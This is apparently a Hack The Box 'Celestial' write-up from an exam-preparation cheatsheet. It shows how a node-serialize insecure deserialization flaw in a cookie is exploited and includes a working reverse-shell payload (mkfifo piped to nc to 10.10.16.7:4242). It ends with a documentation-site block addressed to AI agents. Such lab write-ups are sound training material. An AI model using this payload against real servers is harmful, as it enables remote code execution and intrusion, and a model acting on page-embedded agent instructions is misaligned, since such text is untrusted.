# Node.js - Insecure Deserialization : Celestial (HTB) the `node express` framework is presented at port `3000` ![](/files/ziowCmYGQWcYGzJrty2Y) intercepting the request first gave us 404 page, but if we refresh the page again we can see a new value in the cookie ( `profile` ) ![](/files/NqtRSAI9b6jp3LkU3tk7) decoding the profile value, and we can see that it's a `json` data ![](/files/0jBvd48WBjAAtDwRDEsu) ### Triggering the vulnerability : **Scenario :** we will `serialize` an object and inject it into the cookie parameter ( `profile` ) to see if the server `desrialize` our object, and if that's the case, then the application is vulnerable to insecure deserialization **Serialization Code:** using the below code, we will serialize an object which just has a function that prints the "`the app is vulnerable to insecure deserialization`" message (as described in this article: ) ```bash var serialize = require('node-serialize'); x = { username : function(){ return 'the app is vulnerable to insecure deserialization'; } }; console.log("Serialized: \\n" + serialize.serialize(x)); ``` the serialized object ```bash {"username":"_$$ND_FUNC$$_function(){ return 'the app is vulnerable to insecure deserialization'; }"} ``` and we need to append the `()` value at the end of the function, to make the function self-invoking ( [Immediately invoked function expression (IIFE)](https://en.wikipedia.org/wiki/Immediately-invoked_function_expression) ) ```bash {"username":"_$$ND_FUNC$$_function(){ return 'the app is vulnerable to insecure deserialization'; }()"} ``` encode the object to `base64` ![](/files/S9DXh5nlZYJxyrBIroNG) passing the request , and we can see that the server deserialized our object ![](/files/dWwbNTZAd9HaBqim0kFy) ### Reverse Shell - BASH TCP : we will execute the below command on the server using the serialized object to gain a shell on the server ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4242 >/tmp/f ``` **Serialization Code:** ```bash var serialize = require('node-serialize'); x = { username: function(){require('child_process').execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4242 >/tmp/f", function puts(error, stdout, stderr) {});} }; console.log("Serialized: \\n" + serialize.serialize(x)); ``` Serialized object : ```jsx {"username":"_$$ND_FUNC$$_function(){require('child_process').execSync(\\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.8 4242 >/tmp/f\\", function puts(error, stdout, stderr) {});}"} ``` making the function self-invoking ```bash {"username":"_$$ND_FUNC$$_function(){require('child_process').execSync(\\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4242 >/tmp/f\\", function puts(error, stdout, stderr) {});}()"} ``` and we got the shell ![](/files/HXWK0LGzXpef9QdtyoT2) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://b1tbyte.gitbook.io/cheatsheets/oswe/oswe-preparation-machines/node.js-insecure-deserialization-celestial-htb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.